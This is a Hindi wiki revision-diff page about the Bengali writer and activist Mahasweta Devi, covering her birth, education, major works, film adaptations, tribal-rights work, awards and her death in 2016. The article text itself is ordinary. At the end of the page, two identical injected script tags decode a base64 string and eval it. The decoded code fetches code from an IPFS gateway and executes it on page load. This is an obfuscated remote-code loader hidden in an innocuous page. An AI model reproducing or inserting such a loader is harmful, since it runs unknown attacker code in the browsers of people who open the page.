Difference between revisions of "महाश्वेता देवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अविभावक" to "अभिभावक")
Line 6: Line 6:
 
|जन्म=[[14 जनवरी]], [[1926]]
 
|जन्म=[[14 जनवरी]], [[1926]]
 
|जन्म भूमि=[[ढाका]], ब्रिटिश भारत
 
|जन्म भूमि=[[ढाका]], ब्रिटिश भारत
|मृत्यु=
+
|मृत्यु=[[28 जुलाई]], [[2016]]
|मृत्यु स्थान=
+
|मृत्यु स्थान=[[कोलकाता]], [[भारत]]
 
|अभिभावक=[[पिता]]- मनीष घटक, [[माता]]- धारीत्री देवी
 
|अभिभावक=[[पिता]]- मनीष घटक, [[माता]]- धारीत्री देवी
 
|पालक माता-पिता=
 
|पालक माता-पिता=
Line 13: Line 13:
 
|संतान=
 
|संतान=
 
|कर्म भूमि=[[भारत]]
 
|कर्म भूमि=[[भारत]]
|कर्म-क्षेत्र=साहित्यकार, उपन्यासकार, निबन्धकार
+
|कर्म-क्षेत्र=साहित्यकार, [[उपन्यासकार]], निबन्धकार
|मुख्य रचनाएँ='अग्निगर्भ', 'जंगल के दावेदार', '1084 की माँ', 'माहेश्वर', 'ग्राम बांग्ला', 'झाँसी की रानी', 'मातृछवि' और 'जकड़न' आदि
+
|मुख्य रचनाएँ='अग्निगर्भ', 'जंगल के दावेदार', '1084 की माँ', 'माहेश्वर', 'ग्राम बांग्ला', 'झाँसी की रानी', 'मातृछवि' और 'जकड़न' आदि।
 
|विषय=
 
|विषय=
 
|भाषा=[[हिन्दी]], [[बांग्ला भाषा|बांग्ला]]
 
|भाषा=[[हिन्दी]], [[बांग्ला भाषा|बांग्ला]]
Line 28: Line 28:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=महाश्वेता देवी की कृतियों पर कई फ़िल्मों का निर्माण भी हुआ, जैसे- [[1968]] में 'संघर्ष', [[1993]] में 'रूदाली', [[1998]] में 'हजार चौरासी की माँ' तथा [[2006]] में 'माटी माई' आदि।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=4:15, 20 सितम्बर-2012 (IST)
 
|अद्यतन=4:15, 20 सितम्बर-2012 (IST)
 
}}
 
}}
'''महाश्वेता देवी''' (जन्म- [[14 जनवरी]], [[1926]], [[ढाका]], ब्रिटिश भारत) [[भारत]] की प्रसिद्ध सामाजिक कार्यकर्ता और लेखिका हैं। इन्होंने [[बांग्ला भाषा]] में बेहद संवेदनशील तथा वैचारिक लेखन के माध्यम से उपन्यास तथा कहानियों से [[साहित्य]] को समृद्धशाली बनाया है। अपने लेखन के कार्य के साथ-साथ महाश्वेता देवी ने समाज सेवा में भी सदैव सक्रियता से भाग लिया और इसमें पूरे मन से लगी रहीं। स्त्री अधिकारों, दलितों तथा आदिवासियों के हितों के लिए उन्होंने जूझते हुए व्यवस्था से संघर्ष किया तथा इनके लिए सुविधा तथा न्याय का रास्ता बनाती रहीं। [[1996]] में इन्हें '[[ज्ञानपीठ पुरस्कार]]' से सम्मानित किया गया। महाश्वेता जी ने कम उम्र में ही लेखन कार्य शुरु कर दिया था और विभिन्न साहित्यिक पत्रिकाओं के लिए लघु कथाओं का महत्त्वपूर्ण योगदान दिया।
+
'''महाश्वेता देवी''' ([[अंग्रेज़ी]]: ''Mahasweta Devi'', जन्म- [[14 जनवरी]], [[1926]], [[ढाका]]; मृत्यु- [[28 जुलाई]], [[2016]], [[कोलकाता]]) [[भारत]] की प्रसिद्ध सामाजिक कार्यकर्ता और लेखिका थीं। उन्होंने [[बांग्ला भाषा]] में बेहद संवेदनशील तथा वैचारिक लेखन के माध्यम से उपन्यास तथा कहानियों से [[साहित्य]] को समृद्धशाली बनाया। अपने लेखन के कार्य के साथ-साथ महाश्वेता देवी ने समाज सेवा में भी सदैव सक्रियता से भाग लिया और इसमें पूरे मन से लगी रहीं। स्त्री अधिकारों, दलितों तथा आदिवासियों के हितों के लिए उन्होंने जूझते हुए व्यवस्था से संघर्ष किया तथा इनके लिए सुविधा तथा न्याय का रास्ता बनाती रहीं। [[1996]] में उन्हें '[[ज्ञानपीठ पुरस्कार]]' से सम्मानित किया गया था। महाश्वेता जी ने कम उम्र में ही लेखन कार्य शुरु कर दिया था और विभिन्न साहित्यिक पत्रिकाओं के लिए लघु कथाओं का महत्त्वपूर्ण योगदान दिया।
 
==जीवन परिचय==
 
==जीवन परिचय==
14 जनवरी, 1926 को महाश्वेता देवी का जन्म अविभाजित [[भारत]] के [[ढाका]] में हुआ था। इनके [[पिता]], जिनका नाम मनीष घटक था, वे एक [[कवि]] और उपन्यासकार के रूप में प्रसिद्ध थे। महाश्वेता जी की [[माता]] धारीत्री देवी भी एक लेखिका और सामाजिक कार्यकर्ता थीं। महाश्वेता देवी ने अपनी स्कूली शिक्षा ढाका में ही प्राप्त की। भारत के विभाजन के समय किशोर अवस्था में ही इनका परिवार [[पश्चिम बंगाल]] में आकर रहने लगा था। इसके उपरांत इन्होंने 'विश्वभारती विश्वविद्यालय', शांतिनिकेतन से बी.ए. अंग्रेज़ी विषय के साथ किया। इसके बाद 'कलकत्ता विश्वविद्यालय' से एम.ए. भी [[अंग्रेज़ी]] में किया। महाश्वेता देवी ने अंग्रेज़ी साहित्य में मास्टर की डिग्री प्राप्त की। इसके बाद एक शिक्षक और पत्रकार के रूप में इन्होंने अपना जीवन प्रारम्भ किया। इसके तुरंत बाद ही [[कलकत्ता विश्वविद्यालय]] में अंग्रेज़ी व्याख्याता के रूप में आपने नौकरी प्राप्त कर ली। सन [[1984]] में इन्होंने सेवानिवृत्ति ले ली।
+
14 जनवरी, 1926 को महाश्वेता देवी का जन्म अविभाजित [[भारत]] के [[ढाका]] में हुआ था। उनके [[पिता]], जिनका नाम मनीष घटक था, एक [[कवि]] और उपन्यासकार के रूप में प्रसिद्ध थे। महाश्वेता जी की [[माता]] धारीत्री देवी भी एक लेखिका और सामाजिक कार्यकर्ता थीं। महाश्वेता देवी ने अपनी स्कूली शिक्षा ढाका में ही प्राप्त की। भारत के विभाजन के समय किशोर अवस्था में ही उनका [[परिवार]] [[पश्चिम बंगाल]] में आकर रहने लगा था। इसके उपरांत उन्होंने 'विश्वभारती विश्वविद्यालय', शांतिनिकेतन से बी.ए. [[अंग्रेज़ी]] विषय के साथ किया। इसके बाद 'कलकत्ता विश्वविद्यालय' से एम.ए. भी [[अंग्रेज़ी]] में किया। महाश्वेता देवी ने अंग्रेज़ी साहित्य में मास्टर की डिग्री प्राप्त की थी। इसके बाद एक शिक्षक और पत्रकार के रूप में उन्होंने अपना जीवन प्रारम्भ किया। इसके तुरंत बाद ही [[कलकत्ता विश्वविद्यालय]] में अंग्रेज़ी व्याख्याता के रूप में आपने नौकरी प्राप्त कर ली। सन [[1984]] में इन्होंने सेवानिवृत्ति ले ली।
 
==लेखन कार्य==
 
==लेखन कार्य==
महाश्वेता जी ने कम उम्र में ही लेखन का कार्य शुरु कर दिया था, और विभिन्न साहित्यिक पत्रिकाओं के लिए लघु कथाओं आदि का योगदान दिया। इनका प्रथम उपन्यास 'नाती' [[1957]] में प्रकाशित किया गया था। 'झाँसी की रानी' महाश्वेता देवी की प्रथम रचना है, जो [[1956]] में प्रकाशित हुई। उन्होंने स्वयं ही अपने शब्दों में कहा है- "इसको लिखने के बाद मैं समझ पाई कि मैं एक कथाकार बनूँगी।" इस पुस्तक को महाश्वेता जी ने [[कोलकाता]] में बैठकर नहीं, बल्कि [[सागर]], [[जबलपुर]], [[पूना]], [[इंदौर]] और [[ललितपुर ज़िला|ललितपुर]] के जंगलों; साथ ही [[झाँसी]], [[ग्वालियर]] और [[कालपी]] में घटित तमाम घटनाएँ यानी [[1857]]-[[1858]] में [[इतिहास]] के मंच पर जो कुछ भी हुआ, सबको साथ लेकर लिखा। अपनी नायिका के अलावा लेखिका ने क्रांति के तमाम अग्रदूतों और यहाँ तक कि [[अंग्रेज़]] अफ़सर तक के साथ न्याय करने का प्रयास किया है। महाश्वेता जी कहती हैं- "पहले मेरी मूल विधा कविता थी, अब कहानी और उपन्यास हैं।" उनकी कुछ महत्त्वपूर्ण कृतियों में 'अग्निगर्भ', 'जंगल के दावेदार' और '1084 की माँ', 'माहेश्वर' और 'ग्राम बांग्ला' आदि हैं। पिछले चालीस वर्षों में इनकी छोटी-छोटी कहानियों के बीस संग्रह प्रकाशित किये जा चुके हैं और सौ उपन्यासों के क़रीब प्रकाशित हो चुके हैं।<ref name="mcc">{{cite web |url=http://gadyakosh.org/gk/index.php?title=%E0%A4%AE%E0%A4%B9%E0%A4%BE%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A5%87%E0%A4%A4%E0%A4%BE_%E0%A4%A6%E0%A5%87%E0%A4%B5%E0%A5%80 |title=महाश्वेता देवी |accessmonthday=20 सितम्बर |accessyear=2012 |last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
+
महाश्वेता जी ने कम उम्र में ही लेखन का कार्य शुरु कर दिया था, और विभिन्न साहित्यिक पत्रिकाओं के लिए लघु कथाओं आदि का योगदान दिया। इनका प्रथम [[उपन्यास]] 'नाती' [[1957]] में प्रकाशित किया गया था। 'झाँसी की रानी' महाश्वेता देवी की प्रथम रचना है, जो [[1956]] में प्रकाशित हुई। उन्होंने स्वयं ही अपने शब्दों में कहा था कि- "इसको लिखने के बाद मैं समझ पाई कि मैं एक कथाकार बनूँगी।" इस पुस्तक को महाश्वेता जी ने [[कोलकाता]] में बैठकर नहीं, बल्कि [[सागर]], [[जबलपुर]], [[पूना]], [[इंदौर]] और [[ललितपुर ज़िला|ललितपुर]] के जंगलों; साथ ही [[झाँसी]], [[ग्वालियर]] और [[कालपी]] में घटित तमाम घटनाएँ यानी [[1857]]-[[1858]] में [[इतिहास]] के मंच पर जो कुछ भी हुआ, सबको साथ लेकर लिखा। अपनी नायिका के अलावा लेखिका ने क्रांति के तमाम अग्रदूतों और यहाँ तक कि [[अंग्रेज़]] अफ़सर तक के साथ न्याय करने का प्रयास किया है। महाश्वेता जी कहती थीं- "पहले मेरी मूल विधा [[कविता]] थी, अब [[कहानी]] और [[उपन्यास]] हैं।" उनकी कुछ महत्त्वपूर्ण कृतियों में 'अग्निगर्भ', 'जंगल के दावेदार' और '1084 की माँ', 'माहेश्वर' और 'ग्राम बांग्ला' आदि हैं। पिछले चालीस वर्षों में इनकी छोटी-छोटी कहानियों के बीस संग्रह प्रकाशित किये जा चुके हैं और सौ उपन्यासों के क़रीब प्रकाशित हो चुके हैं।<ref name="mcc">{{cite web |url=http://gadyakosh.org/gk/index.php?title=%E0%A4%AE%E0%A4%B9%E0%A4%BE%E0%A4%B6%E0%A5%8D%E0%A4%B5%E0%A5%87%E0%A4%A4%E0%A4%BE_%E0%A4%A6%E0%A5%87%E0%A4%B5%E0%A5%80 |title=महाश्वेता देवी |accessmonthday=20 सितम्बर |accessyear=2012 |last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
 
====रचनाएँ====
 
====रचनाएँ====
एक पत्रकार, लेखक, साहित्यकार और आंदोलनधर्मी के रूप में अपार ख्याति प्राप्त की। ‘झाँसी की रानी’ महाश्वेता देवी की प्रथम रचना है। जो 1956 में प्रकाशन में आया। उनकी कुछ महत्वपूर्ण कृतियों में 'अग्निगर्भ' 'जंगल के दावेदार' और '1084 की मां', माहेश्वर, ग्राम बांग्ला हैं। पिछले चालीस वर्षों में, आपकी छोटी-छोटी कहानियों के बीस संग्रह प्रकाशित किये जा चुके हैं और सौ उपन्यासों के क़रीब (सभी बंगला भाषा में) प्रकाशित हो चुकी है। महाश्वेता देवी की कृतियों पर फिल्में भी बनीं। 1968 में 'संघर्ष', 1993 में 'रूदाली', 1998 में 'हजार चौरासी की माँ', 2006 में 'माटी माई'।<ref>{{cite web |url=http://www.cmindia.in/2010/02/cmquiz-26_22.html |title=महाश्वेता देवी  |accessmonthday=6 जनवरी |accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिंदी }}</ref> महाश्वेता देवी की कुछ प्रमुख रचनाएँ निम्नलिखित हैं-
+
एक पत्रकार, लेखक, साहित्यकार और आंदोलनधर्मी के रूप में महाश्वेता देवी ने अपार ख्याति प्राप्त की। ‘झाँसी की रानी’ महाश्वेता देवी की प्रथम रचना है, जो [[1956]] में प्रकाशित हुई। उनकी कुछ महत्वपूर्ण कृतियों में 'अग्निगर्भ' 'जंगल के दावेदार' और '1084 की मां', माहेश्वर, ग्राम बांग्ला हैं। पिछले चालीस वर्षों में उनकी छोटी-छोटी कहानियों के बीस संग्रह प्रकाशित किये जा चुके हैं और सौ उपन्यासों के क़रीब (सभी बंगला भाषा में) प्रकाशित हो चुकी है। महाश्वेता देवी की कृतियों पर फिल्में भी बनीं। 1968 में 'संघर्ष', 1993 में 'रूदाली', 1998 में 'हजार चौरासी की माँ', 2006 में 'माटी माई'।<ref>{{cite web |url=http://www.cmindia.in/2010/02/cmquiz-26_22.html |title=महाश्वेता देवी  |accessmonthday=6 जनवरी |accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिंदी }}</ref> महाश्वेता देवी की कुछ प्रमुख रचनाएँ निम्नलिखित हैं-
  
 
:'''लघुकथाएँ''' - मीलू के लिए, मास्टर साब<br />
 
:'''लघुकथाएँ''' - मीलू के लिए, मास्टर साब<br />
Line 51: Line 51:
 
====पुरस्कार====
 
====पुरस्कार====
 
[[1977]] में महाश्वेता देवी को '[[मेग्सेसे पुरस्कार]]' प्रदान किया गया। [[1979]] में उन्हें '[[साहित्य अकादमी पुरस्कार]]' मिला। [[1996]] में '[[ज्ञानपीठ पुरस्कार]]' से वह सम्मानित की गईं। [[1986]] में '[[पद्मश्री]]' तथा फिर [[2006]] में उन्हें '[[पद्मविभूषण]]' सम्मान प्रदान किया गया।
 
[[1977]] में महाश्वेता देवी को '[[मेग्सेसे पुरस्कार]]' प्रदान किया गया। [[1979]] में उन्हें '[[साहित्य अकादमी पुरस्कार]]' मिला। [[1996]] में '[[ज्ञानपीठ पुरस्कार]]' से वह सम्मानित की गईं। [[1986]] में '[[पद्मश्री]]' तथा फिर [[2006]] में उन्हें '[[पद्मविभूषण]]' सम्मान प्रदान किया गया।
 +
==निधन==
 +
महाश्वेता देवी का निधन [[28 जुलाई]], [[2016]] को [[कोलकाता]] में हुआ। उन्हें कोलकाता के [[22 मई]] को बेल व्यू नर्सिंग होम में भर्ती कराया गया था। उनके शरीर के कई महत्वपूर्ण अंगों ने काम करना बंद कर दिया था। दिल का दौरा पड़ने के बाद उनका निधन हो गया।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 14:21, 28 July 2016

mahashveta devi
janm 14 janavari, 1926
janm bhoomi dhaka, british bharat
mrityu 28 julaee, 2016
mrityu sthan kolakata, bharat
abhibhavak pita- manish ghatak, mata- dharitri devi
karm bhoomi bharat
karm-kshetr sahityakar, upanyasakar, nibandhakar
mukhy rachanaean 'agnigarbh', 'jangal ke davedar', '1084 ki maan', 'maheshvar', 'gram baangla', 'jhaansi ki rani', 'matrichhavi' aur 'jak dan' adi.
bhasha hindi, baangla
vidyalay 'vishvabharati vishvavidyalay', shaantiniketan; kalakatta vishvavidyalay
shiksha bi.e., em.e., aangrezi sahity mean mastar digri
puraskar-upadhi 'megsese puraskar' (1977), 'sahity akadami puraskar' (1979), 'padmashri' (1986), 'jnanapith puraskar' (1996), 'padm vibhooshan' (2006)
prasiddhi samajik karyakarta aur lekhika
nagarikata bharatiy
any janakari mahashveta devi ki kritiyoan par kee filmoan ka nirman bhi hua, jaise- 1968 mean 'sangharsh', 1993 mean 'roodali', 1998 mean 'hajar chaurasi ki maan' tatha 2006 mean 'mati maee' adi.
adyatan‎ 4:15, 20 sitambar-2012 (IST)
inhean bhi dekhean kavi soochi, sahityakar soochi

mahashveta devi (aangrezi: Mahasweta Devi, janm- 14 janavari, 1926, dhaka; mrityu- 28 julaee, 2016, kolakata) bharat ki prasiddh samajik karyakarta aur lekhika thian. unhoanne baangla bhasha mean behad sanvedanashil tatha vaicharik lekhan ke madhyam se upanyas tatha kahaniyoan se sahity ko samriddhashali banaya. apane lekhan ke kary ke sath-sath mahashveta devi ne samaj seva mean bhi sadaiv sakriyata se bhag liya aur isamean poore man se lagi rahian. stri adhikaroan, dalitoan tatha adivasiyoan ke hitoan ke lie unhoanne joojhate hue vyavastha se sangharsh kiya tatha inake lie suvidha tatha nyay ka rasta banati rahian. 1996 mean unhean 'jnanapith puraskar' se sammanit kiya gaya tha. mahashveta ji ne kam umr mean hi lekhan kary shuru kar diya tha aur vibhinn sahityik patrikaoan ke lie laghu kathaoan ka mahattvapoorn yogadan diya.

jivan parichay

14 janavari, 1926 ko mahashveta devi ka janm avibhajit bharat ke dhaka mean hua tha. unake pita, jinaka nam manish ghatak tha, ek kavi aur upanyasakar ke roop mean prasiddh the. mahashveta ji ki mata dharitri devi bhi ek lekhika aur samajik karyakarta thian. mahashveta devi ne apani skooli shiksha dhaka mean hi prapt ki. bharat ke vibhajan ke samay kishor avastha mean hi unaka parivar pashchim bangal mean akar rahane laga tha. isake uparaant unhoanne 'vishvabharati vishvavidyalay', shaantiniketan se bi.e. aangrezi vishay ke sath kiya. isake bad 'kalakatta vishvavidyalay' se em.e. bhi aangrezi mean kiya. mahashveta devi ne aangrezi sahity mean mastar ki digri prapt ki thi. isake bad ek shikshak aur patrakar ke roop mean unhoanne apana jivan prarambh kiya. isake turant bad hi kalakatta vishvavidyalay mean aangrezi vyakhyata ke roop mean apane naukari prapt kar li. san 1984 mean inhoanne sevanivritti le li.

lekhan kary

mahashveta ji ne kam umr mean hi lekhan ka kary shuru kar diya tha, aur vibhinn sahityik patrikaoan ke lie laghu kathaoan adi ka yogadan diya. inaka pratham upanyas 'nati' 1957 mean prakashit kiya gaya tha. 'jhaansi ki rani' mahashveta devi ki pratham rachana hai, jo 1956 mean prakashit huee. unhoanne svayan hi apane shabdoan mean kaha tha ki- "isako likhane ke bad maian samajh paee ki maian ek kathakar banooangi." is pustak ko mahashveta ji ne kolakata mean baithakar nahian, balki sagar, jabalapur, poona, iandaur aur lalitapur ke jangaloan; sath hi jhaansi, gvaliyar aur kalapi mean ghatit tamam ghatanaean yani 1857-1858 mean itihas ke manch par jo kuchh bhi hua, sabako sath lekar likha. apani nayika ke alava lekhika ne kraanti ke tamam agradootoan aur yahaan tak ki aangrez afasar tak ke sath nyay karane ka prayas kiya hai. mahashveta ji kahati thian- "pahale meri mool vidha kavita thi, ab kahani aur upanyas haian." unaki kuchh mahattvapoorn kritiyoan mean 'agnigarbh', 'jangal ke davedar' aur '1084 ki maan', 'maheshvar' aur 'gram baangla' adi haian. pichhale chalis varshoan mean inaki chhoti-chhoti kahaniyoan ke bis sangrah prakashit kiye ja chuke haian aur sau upanyasoan ke qarib prakashit ho chuke haian.[1]

rachanaean

ek patrakar, lekhak, sahityakar aur aandolanadharmi ke roop mean mahashveta devi ne apar khyati prapt ki. ‘jhaansi ki rani’ mahashveta devi ki pratham rachana hai, jo 1956 mean prakashit huee. unaki kuchh mahatvapoorn kritiyoan mean 'agnigarbh' 'jangal ke davedar' aur '1084 ki maan', maheshvar, gram baangla haian. pichhale chalis varshoan mean unaki chhoti-chhoti kahaniyoan ke bis sangrah prakashit kiye ja chuke haian aur sau upanyasoan ke qarib (sabhi bangala bhasha mean) prakashit ho chuki hai. mahashveta devi ki kritiyoan par philmean bhi banian. 1968 mean 'sangharsh', 1993 mean 'roodali', 1998 mean 'hajar chaurasi ki maan', 2006 mean 'mati maee'.[2] mahashveta devi ki kuchh pramukh rachanaean nimnalikhit haian-

laghukathaean - miloo ke lie, mastar sab
kahaniyaan - svaha, riportar, vanted
upanyas - nati, agnigarbh, jhaansi ki rani, mardarar ki maan, 1084 ki maan, matrichhavi, jali thi agnishikha, jak dan
atmakatha umrakaid, aklaant kaurav
alekh - krishna dvadashi, amrit sanchay, ghaharati ghataean, bharat mean bandhua mazadoor, untisavian dhara ka aropi, gram baangla, jangal ke davedar, adivasi katha
yatra sansmaran - shri shri ganesh mahima, eeant ke oopar eeant
natak - terodaiktil, daulati[1]

samaj seva

bihar, madhy pradesh tatha chhattisagadh ke adivasi ilake mahashveta devi ke karyakshetr rahe. vahaan inaka dhyan lodha tatha shabara adivasiyoan ki din dasha ki or adhik raha. isi tarah bihar ke palamoo kshetr ke adivasi bhi inake sarokar ka vishay bane. inamean striyoan ki dasha aur bhi dayaniy thi. mahashveta devi ne is sthiti mean sudhar karane ka sankalp liya. 1970 se mahashveta devi ne apane uddeshy ke hit mean vyavastha se sidha hastakshep shuroo kiya. unhoanne pashchim bangal ki audyogik nitiyoan ke khilaf bhi aandolan chhe da tatha vikas ke prachalit kary ko chunauti di.

puraskar

1977 mean mahashveta devi ko 'megsese puraskar' pradan kiya gaya. 1979 mean unhean 'sahity akadami puraskar' mila. 1996 mean 'jnanapith puraskar' se vah sammanit ki geean. 1986 mean 'padmashri' tatha phir 2006 mean unhean 'padmavibhooshan' samman pradan kiya gaya.

nidhan

mahashveta devi ka nidhan 28 julaee, 2016 ko kolakata mean hua. unhean kolakata ke 22 mee ko bel vyoo narsiang hom mean bharti karaya gaya tha. unake sharir ke kee mahatvapoorn aangoan ne kam karana band kar diya tha. dil ka daura p dane ke bad unaka nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 mahashveta devi (hindi). . abhigaman tithi: 20 sitambar, 2012.
  2. mahashveta devi (hiandi). . abhigaman tithi: 6 janavari, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>